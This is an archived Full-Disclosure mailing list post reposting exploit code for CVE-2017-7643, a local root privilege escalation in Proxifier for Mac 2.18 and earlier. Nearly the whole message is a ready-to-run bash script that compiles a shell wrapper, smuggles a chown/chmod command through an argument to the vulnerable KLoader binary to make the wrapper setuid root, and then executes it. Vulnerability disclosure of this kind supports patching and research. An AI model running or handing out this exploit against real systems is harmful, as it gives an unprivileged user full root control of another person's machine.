lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <50A8F46A-CDC5-4FDD-A78D-AFE6000E4066@rkw.io>
Date: Tue, 11 Apr 2017 11:24:33 +0100
From: "Mark Wadham" <fd@....io>
To: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <=
 2.18

Sorry, the exploit code got mangled :S

-------------------------
#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18                                           #
#####################################################################
# by m4rkw                                                          #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
   setuid(0);
   seteuid(0);

   execl("/bin/bash", "bash", NULL);
   return 0;
}
EOF

gcc -o /tmp/a a.c
rm -f a.c
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel 
/tmp/a ; chmod 4755 /tmp/a'
/tmp/a
-------------------------

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ